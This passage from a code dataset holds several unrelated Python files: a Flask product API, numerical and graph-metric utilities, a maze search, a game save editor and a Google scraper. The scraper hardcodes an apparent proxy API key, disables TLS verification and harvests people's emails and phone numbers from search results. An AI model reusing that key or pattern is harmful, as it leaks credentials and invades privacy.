constants.REST_API_MESSAGE: message\n })\n\n\n@bp.route(constants.API_GET_PRODUCT_URL, methods=[constants.GET])\ndef get_product(id):\n return jsonify(Product.query.get_or_404(id).to_json())\n\n\n@bp.route(constants.API_PRODUCT_EXIST_URL, methods=[constants.GET])\ndef is_product_exist(id):\n exist_in_products = helpers.is_product_exist(pid=id)\n\n if not exist_in_products:\n return is_product_exist_response(id, exist_in_products)\n\n exists_in_inventory = helpers.is_product_exist_in_inventory(pid=id)\n if not exists_in_inventory:\n helpers.add_product_in_inventory(pid=id)\n\n status = helpers.is_product_exist_in_inventory(pid=id)\n return is_product_exist_response(id, status)\n\n\ndef add_product_response(pid, is_add):\n if is_add:\n status = constants.REST_API_SUCCESS\n message = constants.REST_API_ADDED_PRODUCT_SUCCESSFULLY_MESSAGE.format(pid)\n else:\n status = constants.REST_API_ERROR\n message = constants.REST_API_ADD_PRODUCT_FAILED_MESSAGE.format(pid)\n\n return jsonify({\n constants.REST_API_STATUS: status,\n constants.REST_API_MESSAGE: message\n })\n\n\n@bp.route(constants.API_ADD_PRODUCT_URL, methods=[constants.POST])\ndef add_product():\n is_add = False\n try:\n data = request.get_json() or {}\n product = Product()\n product.from_dict(data)\n helpers.insert_to_db(product)\n\n # update inventory\n uinventory.add_product(product.id, product.name, helpers.get_quantity(product.quantity))\n\n is_add = True\n except:\n return add_product_response(product.id, is_add)\n\n return add_product_response(product.id, is_add)\n\n\n\n","sub_path":"app/api/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"552335447","text":"import numpy as np\nimport scipy.optimize as sopt\n\n#from util import *\n\n# Lagrange Dual Function to be maximized w/r/t lambda_vars\n# Returns negative value because we want to maximize it using a minimization function\n\nTr = np.trace\n\n\ndef lagrange_dual_factory(X, S, c_const):\n \n def mini_me(lambda_vars):\n Lambda = np.diag(lambda_vars)\n\n return (\n -1 * Tr(X.T @ X) \n - Tr((X @ S.T) @ (np.linalg.pinv(S @ S.T + Lambda)) @ (X @ S.T).T)\n - Tr(c_const * Lambda)\n )\n\n return mini_me\n\n\ndef lagrange_dual_learn(X, S, c_const, L_init = None, method = 'CG'):\n\n # Initial guess = x0. 
If none, set to zeros (optimal for near optimal bases)\n if L_init is None:\n L_init = np.zeros(S.shape[0])\n\n # Solve for optimal lambda\n lambda_vars = sopt.minimize(lagrange_dual_factory(X, S, c_const), L_init, method=method,)\n\n # Set Lambda\n Lambda = np.diag(lambda_vars.x)\n\n # Returns B^T, for B corresponding to basis matrix\n B = (np.linalg.pinv(S @ S.T + Lambda) @ (X @ S.T).T).T\n\n return B\n \n\n\n\n\n\n\n# * LAZY BOI TESTS\n# n0 = 60\n# m0 = 50\n# k0 = 30\n# print(lagrange_dual_learn(S = np.random.randint(5, size = (n0,m0)), X = np.random.randint(5, size = (k0,m0)), n = n0, c_const = 0.001))\n\n \n \n \n# * FILLER, not permanent\n# return (X @ np.linalg.inv(S)).T\n\n\n# * old code:\n# def mini_me(lambda_vars):\n# Lambda = np.diag(lambda_vars)\n \n# trace_mat1 = X.T @ X\n# trace_mat2 = X @ S.T\n# trace_mat3 = np.linalg.inv(S @ S.T + Lambda)\n# trace_mat4 = (X @ S.T).T\n# trace_mat5 = c_const * Lambda\n\n# return -1 * np.trace(trace_mat1) - np.trace(trace_mat2 @ trace_mat3 @ trace_mat4) - np.trace(trace_mat5)\n\n\n\n\n","sub_path":"SR_LSA/lagrange_dual_learn.py","file_name":"lagrange_dual_learn.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"232791844","text":"# https://www.laurentluce.com/posts/solving-mazes-using-python-simple-recursivity-and-a-search/\n\nclass node:\n def __init__(self, location):\n self.left = None\n self.up = None\n self.right = None\n self.down = None\n\n \n\n# find shortest path from start to goal on board with walls\n# can move up down left right but not through walls\n\n# board with boolean values\n# 1 = wall\n# 0 = open\n# 2 = goal\n# 3 = visited\nboard = [\n [0,1],\n [0,2]\n]\n# start point\nstart = [0,0]\n# end point\ngoal = [1,1]\n\nmin_possible_answer = abs(goal[0]) + abs(goal[1]) - abs(start[0]) - abs(start[1])\nmax_possible_answer = len(board) * len(board[0])\n\n# build a min cost matrix working backwards from the goal\n# from left from above from right from below\n# goal-1 1 NULL NULL NULL\n# goal-2 NULL \nshortest_path_matrix = [\n [max_possible_answer, max_possible_answer],\n [max_possible_answer, max_possible_answer],\n]\n#shortest_path_matrix = [] # start\n#for i in range(len(board)):\n# for j in range(len(board[0])):\n# if board[i][j] == 1:\n# shortest_path_matrix[i][j] = 99\n\n#def get_adjacent_tiles(cur_x: int, cur_y: int, max_x: int, max_y: int):\n# adj = []\n # above\n #if \n\n\ngrid = [[0, 0, 0, 0, 0, 1],\n [1, 1, 0, 0, 0, 1],\n [0, 0, 0, 1, 0, 0],\n [0, 1, 1, 0, 0, 1],\n [0, 1, 0, 0, 1, 0],\n [0, 1, 0, 0, 0, 2]]\n\ndef search(x, y):\n if grid[x][y] == 2:\n print('found at %d,%d' % (x, y))\n return True\n elif grid[x][y] == 1:\n print('wall at %d,%d' % (x, y))\n return False\n elif grid[x][y] == 3:\n print('visited at %d,%d' % (x, y))\n return False\n \n print('visiting %d,%d' % (x, y))\n\n # mark as visited\n grid[x][y] = 3\n\n # explore neighbors clockwise starting by the one on the right\n if ((x < len(grid)-1 and search(x+1, y))\n or (y > 0 and search(x, y-1))\n or (x > 0 and search(x-1, y))\n or (y < len(grid)-1 and search(x, y+1))):\n return True\n\n return False\n\nsearch(0, 0)","sub_path":"daily/daily_20190509.py","file_name":"daily_20190509.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"368027403","text":"from vplot import GetOutput\nimport subprocess\nimport matplotlib.pyplot as pl\nimport os\ndir_fw = 
os.path.join(os.path.dirname(os.path.realpath(__file__)), \"forward\")\ndir_bw = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"backward\")\nMyr = 1e6\n\n# Run forward and backward runs\nsubprocess.run(['vplanet', 'vpl.in', '-q'], cwd=dir_fw)\nsubprocess.run(['vplanet', 'vpl.in', '-q'], cwd=dir_bw)\n\n# Grab the output\nforward = GetOutput(path=dir_fw)\nbackward = GetOutput(path=dir_bw)\n\n# Plot\nfig, ax = pl.subplots(2)\nax[0].set_ylabel('Semi Major Axis [AU]', fontweight='bold')\nax[1].set_ylabel('Eccentricity', fontweight='bold')\nax[1].set_xlabel('Time [Myr]', fontweight='bold')\nax[0].plot(forward.a.Time / Myr, forward.a.SemiMajorAxis,\n label='forward')\nax[1].plot(forward.a.Time / Myr, forward.a.Eccentricity,\n label='forward')\nax[0].plot(300 + backward.a.Time / Myr, backward.a.SemiMajorAxis,\n label='backward')\nax[1].plot(300 + backward.a.Time / Myr, backward.a.Eccentricity,\n label='backward')\nax[0].legend(loc='lower right')\nax[1].legend(loc='lower right')\npl.show()\n","sub_path":"examples/backward/backward.py","file_name":"backward.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"577463347","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport time\nimport warnings\nwarnings.filterwarnings('ignore')\nheaders = {\n 'accept': '*/*',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'en-us;q=0.5,en;q=0.3',\n 'connection': 'keep-alive',\n 'user-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0'\n}\n\nurl = 'https://www.google.com/search'\n# proxies = {\"http\": \"127.0.0.1:1080\", \"https\": \"127.0.0.1:1080\"}\nproxy_host = \"proxy.crawlera.com\"\nproxy_port = \"8010\"\nproxy_auth = \"0b3d10012b61488aa0667b27c829d5de:\"\nproxies = {\"https\": \"https://{}@{}:{}/\".format(proxy_auth, proxy_host, proxy_port),\n \"http\": \"http://{}@{}:{}/\".format(proxy_auth, proxy_host, proxy_port)}\n\n\n# 爬取网页返回soup对象\ndef make_soup_google(payloads):\n content = ''\n try:\n html = requests.get(\n url,\n params=payloads,\n headers=headers,\n proxies=proxies,\n verify=False\n )\n html.encoding = \"utf-8\"\n content = html.text\n except Exception as e:\n print(e)\n\n if content is not None and len(content) > 0:\n return BeautifulSoup(content, 'lxml')\n else:\n return None\n\n\ndef get_email_and_phone(key_words):\n payloads = {\n \"q\": key_words + ' and email and phone',\n }\n\n soup = make_soup_google(payloads)\n if soup is None:\n return '', ''\n\n # 获取摘要\n tag_results = soup.select(\"span[class='st']\")\n results = {str(tr)\n .replace(r\"\", '')\n .replace(r\"\", '')\n .replace(r\"\", '')\n .replace(r\"\", '') for tr in tag_results}\n\n emailRegex = re.compile(r\"\"\"([a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+(\\.[a-zA-Z]{2,4}))\"\"\", re.VERBOSE)\n emailFilterRegex = re.compile(r\"\"\"^[Ee]-?mail\"\"\")\n\n phoneRegex = re.compile(r\"\"\"([Pp]hone|[Mm]obile)[,:]?\\s*(\\+\\s?[\\d]+\\s?)?(\\([\\d\\-. 
]+\\)\\s{0,2})*(\\d+[/.-]?\\s?)*\"\"\", re.VERBOSE)\n phoneFilterRegex = re.compile(r\"\"\"([Pp]hone|[Mm]obile)[,:]?\\s*\"\"\")\n\n email = str()\n phone = str()\n # 每一条摘要\n for r in results:\n pho = phoneRegex.search(r)\n pho_no = phoneFilterRegex.sub('', pho.group()).strip() if pho is not None else ''\n phone = pho_no if len(pho_no) > len(phone) else phone\n\n ems = [emailFilterRegex.sub('', e).strip() for a in emailRegex.findall(r) for e in a]\n for e in ems:\n email = e if len(e) > len(email) else email\n return email, phone\n\n\ndef get_address(affiliation):\n payloads = {\n \"q\": 'where is ' + affiliation.split(';')[0] + 'located?',\n }\n\n soup = make_soup_google(payloads)\n if soup is None:\n return ''\n tag_results = soup.select(\"div[class='Z0LcW']\")\n address = tag_results[0].getText() if len(tag_results) > 0 else ''\n return address\n\n\ndef get_country(affiliation):\n payloads = {\n \"q\": 'what country is ' + affiliation.split(';')[0] + ' in?',\n }\n\n soup = make_soup_google(payloads)\n if soup is None:\n return ''\n tag_results = soup.select(\"div[class='Z0LcW']\")\n country = tag_results[0].getText() if len(tag_results) > 0 else ''\n return country if country is not None else ''\n\n\ndef get_language(country):\n payloads = {\n \"q\": 'what language do they speak in ' + country + '?',\n }\n\n soup = make_soup_google(payloads)\n if soup is None:\n return ''\n tag_results = soup.select(\"div[class='Z0LcW']\")\n language = tag_results[0].getText() if len(tag_results) > 0 else ''\n return language\n\n\ndef get_position(key_words):\n payloads = {\n \"q\": key_words + ' professor or researcher or scientist',\n }\n\n soup = make_soup_google(payloads)\n if soup is None:\n return ''\n tag_results = soup.select(\"span[class='st']\")\n results = {str(tr)\n .replace(r\"\", '')\n .replace(r\"\", '')\n .replace(r\"\", '')\n .replace(r\"\", '') for tr in tag_results}\n\n associateProfessorRegex = re.compile('''[Aa]ssociate\\s+[Pp]rofessor''')\n assistantProfessorRegex = re.compile('''[Aa]ssistant\\s+[Pp]rofessor''')\n professorRegex = re.compile('''[Pp]rofessor''')\n researcherRegex = re.compile('''[Rr]esearcher''')\n scientistRegex = re.compile('''[Ss]cientist''')\n\n # position需要设置优先级\n for r in results:\n if associateProfessorRegex.search(r):\n return 'Associate Professor'\n\n if assistantProfessorRegex.search(r):\n return 'Assistant Professor'\n\n if professorRegex.search(r):\n return \"Professor\"\n\n if researcherRegex.search(r):\n return 'Researcher'\n\n if scientistRegex.search(r):\n return 'Scientist'\n\n return ' '\n\n\nif __name__ == \"__main__\":\n print(get_country('stanford university'))","sub_path":"Google_complement.py","file_name":"Google_complement.py","file_ext":"py","file_size_in_byte":4866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"21089259","text":"import os.path\n\n\ndef get_offset(character):\n ''' Find the offset of a character\n 1. Convert the string into a bytearray\n 2. Search for its offset\n '''\n\n with open(os.path.expanduser('~/DOS/Ultima_5/SAVED.GAM'), \"r+b\") as input_file: #open the \"SAVED.GAM\" file from the home directory\n file = input_file.read()\n b = bytearray()\n b.extend(map(ord, character))\n offset = file.index(b)\n input_file.close()\n return offset\n\n\ndef Modify(offset, value, isTwoByte):\n ''' The modification function\n : if: the hexadecimal value is two-byte long\n 1. A three-digit hexadecimal value\n 2. A two-digit hexadecimal value\n 3. 
A common four-digit hexadecimal value\n : else: the hexadecimal value is one-byte long\n '''\n\n with open(os.path.expanduser('~/DOS/Ultima_5/SAVED.GAM'), \"r+b\") as file: #open the \"SAVED.GAM\" file from the home directory\n file.seek(offset)\n hex_value = hex(value).split('x')[-1]\n if(isTwoByte):\n if(value < 4096 and value > 255):\n file.write(bytearray([int(hex_value[1:3],16)]))\n file.seek(offset+1)\n file.write(bytearray([int(hex_value[0],16)]))\n elif(value < 256):\n file.write(bytearray([int(hex_value[0:2],16)]))\n file.seek(offset+1)\n file.write(bytearray([0]))\n else:\n file.write(bytearray([int(hex_value[2:4],16)]))\n file.seek(offset+1)\n file.write(bytearray([int(hex_value[0:2],16)]))\n else:\n file.write(bytearray([value]))\n file.close()\n return 0\n\n\ndef mod_char(offset):\n ''' Input menu for character modification '''\n\n Str = int(input(\"Strength: \"))\n Modify(offset+12, Str, False)\n Int = int(input(\"Intelligence: \"))\n Modify(offset+14, Int, False)\n Dex = int(input(\"Dexterity: \"))\n Modify(offset+13, Dex, False)\n HP = int(input(\"Health points: \"))\n Modify(offset+16, HP, True)\n MAX_HP = int(input(\"Max health points: \"))\n Modify(offset+18, MAX_HP, True)\n Exp = int(input(\"Experience: \"))\n Modify(offset+20, Exp, True)\n\n\ndef mod_items():\n ''' Input menu for items and gold modification '''\n\n offset = 516\n gold = int(input(\"Gold: \"))\n Modify(offset, gold, True)\n keys = int(input(\"Keys: \"))\n Modify(offset+2, keys, False)\n skull = int(input(\"Skull keys: \"))\n Modify(offset+7, skull, False)\n gems = int(input(\"Gems: \"))\n Modify(offset+3, gems, False)\n badge = int(input(\"Black badge: \"))\n Modify(offset+20, badge, False)\n carpets = int(input(\"Magic carpets: \"))\n Modify(offset+6, carpets, False)\n axes = int(input(\"Magic axes: \"))\n Modify(offset+60, axes, False)\n\n\ndef menu():\n print(\"\\n---- CHARACTERS -------------------------------------------------------------------------------------\")\n data = [['[1] Main', '[2] Shamino', '[3] Iolo', '[4] Mariah', '[5] Geoffrey', '[6] Jaana'],\n ['[7] Julia', '[8] Dupre', '[9] Katrina', '[10] Sentri', '[11] Gwenno', '[12] Johne'],\n ['[13] Gorn', '[14] Maxwell', '[15] Toshi', '[16] Saduj', '[17] Equipments']]\n\n col_width = max(len(word) for row in data for word in row) + 2 # padding\n for row in data:\n print(\"\".join(word.ljust(col_width) for word in row))\n\n print(\n '-----------------------------------------------------------------------------------------------------' + '\\n')\n\n\ndef main():\n menu()\n data = ['[1] Main','[2] Shamino', '[3] Iolo', '[4] Mariah', '[5] Geoffrey', '[6] Jaana',\n '[7] Julia','[8] Dupre', '[9] Katrina', '[10] Sentri', '[11] Gwenno', '[12] Johne',\n '[13] Gorn', '[14] Maxwell', '[15] Toshi', '[16] Saduj', '[17] Equipments']\n\n again = 'Y'\n while(again == 'Y'):\n choice = input(\"Enter your choice: \")\n a = ''.join([i for i in data[int(choice)-1] if i.isalpha()]) # character's name\n if choice != '17':\n mod_char(get_offset(a))\n elif choice == '17':\n mod_items()\n else:\n print(\"Invalid input!\")\n again = input(\"Do you want to continue? 
[Y/N] \")\n\n return 0\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"program/Cheat.py","file_name":"Cheat.py","file_ext":"py","file_size_in_byte":4256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"282765865","text":"import os\n\nimport networkx as nx\n\n\nclass RandomGraph(object):\n def __init__(self, node_num, p, k=4, m=5, is_train=True, name='', graph_mode=\"WS\", seed=-1):\n self.node_num = node_num\n self.p = p\n self.k = k\n self.m = m\n self.graph_mode = graph_mode\n self.seed = seed\n self.name = name\n\n if is_train is True:\n print(\"is_train: True\")\n self.graph = self.make_graph()\n self.save_random_graph(self.name)\n else:\n self.graph = self.load_random_graph(self.name)\n\n self.nodes, self.in_edges = self.get_graph_info()\n\n def make_graph(self):\n\n if self.graph_mode == \"ER\":\n if self.seed == -1:\n my_graph = nx.random_graphs.erdos_renyi_graph(self.node_num, self.p)\n else:\n my_graph = nx.random_graphs.erdos_renyi_graph(self.node_num, self.p, self.seed)\n\n elif self.graph_mode == \"WS\":\n if self.seed == -1:\n my_graph = nx.random_graphs.connected_watts_strogatz_graph(self.node_num, self.k, self.p, tries=1000)\n else:\n my_graph = nx.random_graphs.connected_watts_strogatz_graph(self.node_num, self.k, self.p, 1000,\n self.seed)\n\n elif self.graph_mode == \"BA\":\n if self.seed == -1:\n my_graph = nx.random_graphs.barabasi_albert_graph(self.node_num, self.m)\n else:\n my_graph = nx.random_graphs.barabasi_albert_graph(self.node_num, self.m, self.seed)\n\n return my_graph\n\n def get_graph_info(self):\n in_edges = {0: []}\n nodes = [0]\n end = []\n for node in self.graph.nodes():\n neighbors = list(self.graph.neighbors(node))\n neighbors.sort()\n\n edges = []\n check = []\n for neighbor in neighbors:\n if node > neighbor:\n edges.append(neighbor + 1)\n check.append(neighbor)\n if not edges:\n edges.append(0)\n in_edges[node + 1] = edges\n if check == neighbors:\n end.append(node + 1)\n nodes.append(node + 1)\n in_edges[self.node_num + 1] = end\n nodes.append(self.node_num + 1)\n\n return nodes, in_edges\n\n def get_network_graph(self):\n net_graph = nx.Graph()\n\n for x in self.nodes:\n net_graph.add_node(x)\n\n for i in self.in_edges:\n for j in self.in_edges[i]:\n net_graph.add_edge(i, j, name=str(i) + '-' + str(j))\n return net_graph\n\n def get_network_di_graph(self):\n net_graph = nx.DiGraph()\n\n for x in self.nodes:\n net_graph.add_node(x)\n\n for i in self.in_edges:\n for j in self.in_edges[i]:\n net_graph.add_edge(i, j, name=str(i) + '-' + str(j))\n return net_graph\n\n def get_in_degree(self):\n in_degree = []\n for x in self.in_edges:\n in_degree.append(len(self.in_edges[x]))\n return in_degree\n\n def get_out_degree(self):\n out_degree = []\n for x in range(len(self.in_edges)):\n count = 0\n for a in self.in_edges:\n if x in self.in_edges[a]:\n count = count + 1\n out_degree.append(count)\n\n return out_degree\n\n def get_edge_metrics(self, df, connection):\n net_graph = self.get_network_graph()\n di_graph = self.get_network_di_graph()\n\n # UNDIRECTED GRAPH\n deg_centrality = nx.degree_centrality(net_graph)\n close_centrality = nx.closeness_centrality(net_graph)\n bet_centrality = nx.betweenness_centrality(net_graph)\n curr_flow_close_centrality = nx.current_flow_closeness_centrality(net_graph)\n curr_flow_bet_centrality = nx.current_flow_betweenness_centrality(net_graph)\n eigen_centrality = nx.eigenvector_centrality(net_graph)\n katz_centrality = nx.katz_centrality(net_graph)\n 
comm_bet_centrality = nx.communicability_betweenness_centrality(net_graph)\n load_centrality = nx.load_centrality(net_graph)\n page_rank = nx.pagerank(net_graph)\n communicability = nx.communicability(net_graph)\n average_neighbor_degree = nx.average_neighbor_degree(net_graph)\n edge_curr_flow_bet_centrality = nx.edge_current_flow_betweenness_centrality(net_graph)\n edge_load_centrality = nx.edge_load_centrality(net_graph)\n\n deg_c_a = []\n deg_c_b = []\n close_c_a = []\n close_c_b = []\n bet_c_a = []\n bet_c_b = []\n curr_flow_c_a = []\n curr_flow_c_b = []\n curr_flow_bet_centrality_a = []\n curr_flow_bet_centrality_b = []\n eigen_centrality_a = []\n eigen_centrality_b = []\n katz_centrality_a = []\n katz_centrality_b = []\n comm_bet_centrality_a = []\n comm_bet_centrality_b = []\n load_centrality_a = []\n load_centrality_b = []\n page_rank_a = []\n page_rank_b = []\n dispersion = []\n comm = []\n node_connectivity = []\n edge_connectivity = []\n avg_neighbor_degree_a = []\n avg_neighbor_degree_b = []\n edge_curr_flow_bet_cent = []\n group_bet_cent = []\n group_clo_cent = []\n group_deg_cent = []\n edge_load_cent = []\n simrank_similarity = []\n volume = []\n depth_a = []\n depth_b = []\n\n # DIRECTED GRAPH\n in_deg_centrality = nx.in_degree_centrality(di_graph)\n out_deg_centrality = nx.out_degree_centrality(di_graph)\n edge_bet_centrality = nx.edge_betweenness_centrality(di_graph)\n\n in_deg_c_a = []\n in_deg_c_b = []\n out_deg_c_a = []\n out_deg_c_b = []\n edge_bet_cent = []\n group_in_deg_cent = []\n group_out_deg_cent = []\n\n for i in connection:\n nodes = i.split('-')\n node_a = int(nodes[0])\n node_b = int(nodes[1])\n\n deg_c_a.append(deg_centrality[node_a])\n deg_c_b.append(deg_centrality[node_b])\n close_c_a.append(close_centrality[node_a])\n close_c_b.append(close_centrality[node_b])\n bet_c_a.append(bet_centrality[node_a])\n bet_c_b.append(bet_centrality[node_b])\n curr_flow_c_a.append(curr_flow_close_centrality[node_a])\n curr_flow_c_b.append(curr_flow_close_centrality[node_b])\n curr_flow_bet_centrality_a.append(curr_flow_bet_centrality[node_a])\n curr_flow_bet_centrality_b.append(curr_flow_bet_centrality[node_b])\n eigen_centrality_a.append(eigen_centrality[node_a])\n eigen_centrality_b.append(eigen_centrality[node_b])\n katz_centrality_a.append(katz_centrality[node_a])\n katz_centrality_b.append(katz_centrality[node_b])\n comm_bet_centrality_a.append(comm_bet_centrality[node_a])\n comm_bet_centrality_b.append(comm_bet_centrality[node_b])\n load_centrality_a.append(load_centrality[node_a])\n load_centrality_b.append(load_centrality[node_b])\n page_rank_a.append(page_rank[node_a])\n page_rank_b.append(page_rank[node_b])\n dispersion.append(nx.dispersion(net_graph, node_a, node_b))\n comm.append(communicability[node_a][node_b])\n node_connectivity.append((nx.node_connectivity(net_graph, node_a, node_b)))\n edge_connectivity.append(nx.edge_connectivity(net_graph, node_a, node_b))\n avg_neighbor_degree_a.append(average_neighbor_degree[node_a])\n avg_neighbor_degree_b.append(average_neighbor_degree[node_b])\n in_deg_c_a.append(in_deg_centrality[node_a])\n in_deg_c_b.append(in_deg_centrality[node_b])\n out_deg_c_a.append(out_deg_centrality[node_a])\n out_deg_c_b.append(out_deg_centrality[node_b])\n edge_bet_cent.append(edge_bet_centrality[node_b, node_a])\n if (node_b, node_a) in edge_curr_flow_bet_centrality.keys():\n edge_curr_flow_bet_cent.append(edge_curr_flow_bet_centrality[node_b, node_a])\n else:\n edge_curr_flow_bet_cent.append(edge_curr_flow_bet_centrality[node_a, 
node_b])\n\n group_bet_cent.append(nx.group_betweenness_centrality(net_graph, [node_a, node_b]))\n group_clo_cent.append(nx.group_closeness_centrality(net_graph, [node_a, node_b]))\n group_deg_cent.append(nx.group_degree_centrality(net_graph, [node_a, node_b]))\n group_in_deg_cent.append(nx.group_in_degree_centrality(di_graph, [node_a, node_b]))\n group_out_deg_cent.append(nx.group_out_degree_centrality(di_graph, [node_a, node_b]))\n edge_load_cent.append(edge_load_centrality[node_b, node_a])\n simrank_similarity.append(nx.simrank_similarity(net_graph, node_a, node_b))\n volume.append(nx.volume(net_graph, [node_a, node_b]))\n depth_a.append(nx.shortest_path_length(net_graph, 0, node_a))\n depth_b.append(nx.shortest_path_length(net_graph, 0, node_b))\n\n df['deg_c_a'] = deg_c_a\n df['deg_c_b'] = deg_c_b\n df['close_c_a'] = close_c_a\n df['close_c_b'] = close_c_b\n df['bet_c_a'] = bet_c_a\n df['bet_c_b'] = bet_c_b\n df['curr_flow_c_a'] = curr_flow_c_a\n df['curr_flow_c_b'] = curr_flow_c_b\n df['curr_flow_bet_centrality_a'] = curr_flow_bet_centrality_a\n df['curr_flow_bet_centrality_b'] = curr_flow_bet_centrality_b\n df['eigen_centrality_a'] = eigen_centrality_a\n df['eigen_centrality_b'] = eigen_centrality_b\n df['katz_centrality_a'] = katz_centrality_a\n df['katz_centrality_b'] = katz_centrality_b\n df['comm_bet_centrality_a'] = comm_bet_centrality_a\n df['comm_bet_centrality_b'] = comm_bet_centrality_b\n df['load_centrality_a'] = load_centrality_a\n df['load_centrality_b'] = load_centrality_b\n df['page_rank_a'] = page_rank_a\n df['page_rank_b'] = page_rank_b\n df['dispersion'] = dispersion\n df['comm'] = comm\n df['connectivity'] = node_connectivity\n df['edge_connectivity'] = edge_connectivity\n df['avg_neighbor_degree_a'] = avg_neighbor_degree_a\n df['avg_neighbor_degree_b'] = avg_neighbor_degree_b\n df['in_deg_c_a'] = in_deg_c_a\n df['in_deg_c_b'] = in_deg_c_b\n df['out_deg_c_a'] = out_deg_c_a\n df['out_deg_c_b'] = out_deg_c_b\n df['edge_bet_cent'] = edge_bet_cent\n df['edge_curr_flow_bet_centrality'] = edge_curr_flow_bet_cent\n df['group_bet_cent'] = group_bet_cent\n df['group_clo_cent'] = group_clo_cent\n df['group_deg_cent'] = group_deg_cent\n df['group_in_deg_cent'] = group_in_deg_cent\n df['group_out_deg_cent'] = group_out_deg_cent\n df['edge_load_cent'] = edge_load_cent\n df['simrank_similarity'] = simrank_similarity\n df['volume'] = volume\n df['depth_a'] = depth_a\n df['depth_b'] = depth_b\n\n return df\n\n def get_node_metrics(self, df, nodes):\n net_graph = self.get_network_graph()\n di_graph = self.get_network_di_graph()\n\n # UNDIRECTED GRAPH\n deg_centrality = nx.degree_centrality(net_graph)\n close_centrality = nx.closeness_centrality(net_graph)\n bet_centrality = nx.betweenness_centrality(net_graph)\n curr_flow_close_centrality = nx.current_flow_closeness_centrality(net_graph)\n curr_flow_bet_centrality = nx.current_flow_betweenness_centrality(net_graph)\n eigen_centrality = nx.eigenvector_centrality(net_graph)\n katz_centrality = nx.katz_centrality(net_graph)\n comm_bet_centrality = nx.communicability_betweenness_centrality(net_graph)\n load_centrality = nx.load_centrality(net_graph)\n page_r = nx.pagerank(net_graph)\n communicability = nx.communicability(net_graph)\n average_neighbor_degree = nx.average_neighbor_degree(net_graph)\n\n deg_cent = []\n close_cent = []\n bet_cent = []\n curr_flow_cent = []\n curr_flow_bet_cent = []\n eigen_cent = []\n katz_cent = []\n comm_bet_cent = []\n load_cent = []\n page_rank = []\n dispersion = []\n comm = []\n node_connectivity = 
[]\n avg_neighbor_degree_a = []\n group_bet_cent = []\n group_clo_cent = []\n group_deg_cent = []\n volume = []\n depth = []\n\n # DIRECTED GRAPH\n in_deg_centrality = nx.in_degree_centrality(di_graph)\n out_deg_centrality = nx.out_degree_centrality(di_graph)\n\n in_deg_cent = []\n out_deg_cent = []\n group_in_deg_cent = []\n group_out_deg_cent = []\n\n for node in nodes:\n deg_cent.append(deg_centrality[node])\n close_cent.append(close_centrality[node])\n bet_cent.append(bet_centrality[node])\n curr_flow_cent.append(curr_flow_close_centrality[node])\n curr_flow_bet_cent.append(curr_flow_bet_centrality[node])\n eigen_cent.append(eigen_centrality[node])\n katz_cent.append(katz_centrality[node])\n comm_bet_cent.append(comm_bet_centrality[node])\n load_cent.append(load_centrality[node])\n page_rank.append(page_r[node])\n dispersion.append(nx.dispersion(net_graph, 0, node))\n comm.append(communicability[0][node])\n node_connectivity.append((nx.node_connectivity(net_graph, 0, node)))\n avg_neighbor_degree_a.append(average_neighbor_degree[node])\n in_deg_cent.append(in_deg_centrality[node])\n out_deg_cent.append(out_deg_centrality[node])\n group_bet_cent.append(nx.group_betweenness_centrality(net_graph, [0, node]))\n group_clo_cent.append(nx.group_closeness_centrality(net_graph, [0, node]))\n group_deg_cent.append(nx.group_degree_centrality(net_graph, [0, node]))\n group_in_deg_cent.append(nx.group_in_degree_centrality(di_graph, [0, node]))\n group_out_deg_cent.append(nx.group_out_degree_centrality(di_graph, [0, node]))\n volume.append(nx.volume(net_graph, [0, node]))\n depth.append(nx.shortest_path_length(net_graph, 0, node))\n\n df['deg_cent'] = deg_cent\n df['close_cent'] = close_cent\n df['bet_cent'] = bet_cent\n df['curr_flow_cent'] = curr_flow_cent\n df['curr_flow_bet_cent'] = curr_flow_bet_cent\n df['eigen_cent'] = eigen_cent\n df['katz_cent'] = katz_cent\n df['comm_bet_cent'] = comm_bet_cent\n df['load_cent'] = load_cent\n df['page_rank'] = page_rank\n df['dispersion'] = dispersion\n df['comm'] = comm\n df['connectivity'] = node_connectivity\n df['avg_neighbor_degree_a'] = avg_neighbor_degree_a\n df['in_deg_cent'] = in_deg_cent\n df['out_deg_cent'] = out_deg_cent\n df['group_bet_cent'] = group_bet_cent\n df['group_clo_cent'] = group_clo_cent\n df['group_deg_cent'] = group_deg_cent\n df['group_in_deg_cent'] = group_in_deg_cent\n df['group_out_deg_cent'] = group_out_deg_cent\n df['volume'] = volume\n df['depth'] = depth\n return df\n\n def save_random_graph(self, path):\n if not os.path.isdir(\"saved_graph\"):\n os.mkdir(\"saved_graph\")\n nx.write_yaml(self.graph, \"./saved_graph/\" + path)\n\n def load_random_graph(self, path):\n print(path)\n self.graph = nx.read_yaml(\"./saved_graph/\" + path)\n return self.graph\n","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":15663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"519837074","text":"class Solution:\n \"\"\"\n @param target: the target\n @param array: an array\n @return: the closest value\n \"\"\"\n\n def closestTargetValue(self, target, array):\n if not array or len(array) < 2:\n return -1\n\n array.sort()\n # print(array)\n result = -1\n left, right = 0, len(array) - 1\n while left < right:\n sum = array[left] + array[right]\n # print(sum)\n if sum < target:\n left += 1\n result = sum if abs(target - sum) < abs(target - result) else result\n elif sum > target:\n right -= 1\n else:\n return target\n\n return result","sub_path":"1478. 
